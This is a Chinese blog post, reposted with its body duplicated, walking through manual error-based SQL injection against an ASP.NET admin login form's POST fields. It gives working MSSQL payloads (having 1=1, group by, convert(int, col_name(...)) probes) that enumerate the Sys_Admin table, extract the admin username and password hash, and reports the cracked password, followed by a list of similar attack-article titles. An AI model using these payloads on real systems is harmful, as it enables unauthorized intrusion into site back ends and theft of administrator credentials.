后台登陆框post注入实战
2012-11-24 18:58
357 查看
[align=left]后台登陆框post注入按照注入的方式属于post,和前台搜索型post注入、文本框注入类似,由于目前主流的注入工具除了穿山甲等较新工具以外几乎都是get注入,尤其是对于这种后台账户型post注入式无能为力的,所以手工注入就显得尤为重要了,今天就用实战说明一下大家不大在意的post注入的手注方法。(以后也会补充一个cookie注入的实战例子)[/align]
[align=left]http://xxx.com/login.aspx[/align]
[align=left]1.爆数据库的表段和相关字段[/align]
[align=left]' having 1=1--[/align]
[align=left]说明有表名叫 Sys_Admin 字段有 password[/align]
[align=left]2.爆Sys_Admin下的其他字段。[/align]
[align=left]' group by Sys_Admin.Password having 1=1--[/align]
[align=left]不知道为何没法用这种方式继续爆表段的其他字段[/align]
[align=left]失败。[/align]
[align=left]3 换种方式爆Sys_Admin表段的其他字段[/align]
[align=left]1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),1) from Sys_Admin)) and '1'='1[/align]
[align=left]1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),2) from Sys_Admin)) and '1'='1[/align]
[align=left]这就是我们一开始就和表段一起爆出来的密码字段。[/align]
[align=left]1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),3) from Sys_Admin)) and '1'='1[/align]
[align=left]在将 nvarchar 值 'Name' 转换成数据类型 int 时失败。[/align]
[align=left]由结果可以推断管理员账户是在name字段中,密码是在password字段中。[/align]
[align=left]4.然后就是分别爆字段内容了[/align]
[align=left]' and (select top 1 Sys_Admin.Name from Sys_Admin)>0--[/align]
[align=left]所以爆出来的是admin[/align]
[align=left]' and (select top 1 Sys_Admin.Password from Sys_Admin)>0--[/align]
[align=left]爆出来的密码是 D14E21B3210EF7C7EB42EC9740A1EE7E[/align]
[align=left]经过破解是:pjxh3100312[/align]
[align=left]所有后台账户和密码是 admin pjxh3100312[/align]
[align=left]经过分析还有实例联系说明,手工注入的方法不能死板,可以多种方法结合一起使用,学习多种数据库的使用是非常有必要的。[/align]
本文出自 “greetwin” 博客,请务必保留此出处http://greetwin.blog.51cto.com/6238812/1069807
[align=left]http://xxx.com/login.aspx[/align]
[align=left]1.爆数据库的表段和相关字段[/align]
[align=left]' having 1=1--[/align]
[align=left]说明有表名叫 Sys_Admin 字段有 password[/align]
[align=left]2.爆Sys_Admin下的其他字段。[/align]
[align=left]' group by Sys_Admin.Password having 1=1--[/align]
[align=left]不知道为何没法用这种方式继续爆表段的其他字段[/align]
[align=left]失败。[/align]
[align=left]3 换种方式爆Sys_Admin表段的其他字段[/align]
[align=left]1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),1) from Sys_Admin)) and '1'='1[/align]
[align=left]1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),2) from Sys_Admin)) and '1'='1[/align]
[align=left]这就是我们一开始就和表段一起爆出来的密码字段。[/align]
[align=left]1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),3) from Sys_Admin)) and '1'='1[/align]
[align=left]在将 nvarchar 值 'Name' 转换成数据类型 int 时失败。[/align]
[align=left]由结果可以推断管理员账户是在name字段中,密码是在password字段中。[/align]
[align=left]4.然后就是分别爆字段内容了[/align]
[align=left]' and (select top 1 Sys_Admin.Name from Sys_Admin)>0--[/align]
[align=left]所以爆出来的是admin[/align]
[align=left]' and (select top 1 Sys_Admin.Password from Sys_Admin)>0--[/align]
[align=left]爆出来的密码是 D14E21B3210EF7C7EB42EC9740A1EE7E[/align]
[align=left]经过破解是:pjxh3100312[/align]
[align=left]所有后台账户和密码是 admin pjxh3100312[/align]
[align=left]经过分析还有实例联系说明,手工注入的方法不能死板,可以多种方法结合一起使用,学习多种数据库的使用是非常有必要的。[/align]
本文出自 “greetwin” 博客,请务必保留此出处http://greetwin.blog.51cto.com/6238812/1069807
相关文章推荐
- aspx后台登陆框post注入实战
- 后台登陆框post注入实战
- sqlmap之(六)----POST登陆框注入实战
- 对一个web渗透 后台登陆框post提交注入 报错类型 (小刀)
- 后台登陆框post注入
- Python Post and Get 登陆web后台系统并抓取页面
- SQL另类注入之绕过后台登陆验证
- 126cms后台登陆注入漏洞
- 捅伊朗黑客PP — 后台登陆POST+错误回显 注入
- SQL另类注入之绕过后台登陆验证
- AFN之POST与后台交互,实现用户登陆的实现
- yii2大型商城实战开发(后台登陆功能)
- JAVA程序通过后台登陆网站,获取Session,然后再POST Http Request添加数据到数据库的实例
- burp结合sqlmap进行后台登录框post注入
- 后台post注入爆密码
- Python Post and Get 登陆web后台系统并抓取页面
- SQLMAP渗透笔记之POST登陆框注入
- 通过后台登入界面拿到管理员帐号密码-post注入
- 解决DestoonB2B后台登陆出现:license.txt不可修改或删除(转)
- 【python】实战:“唱啥”app后台开发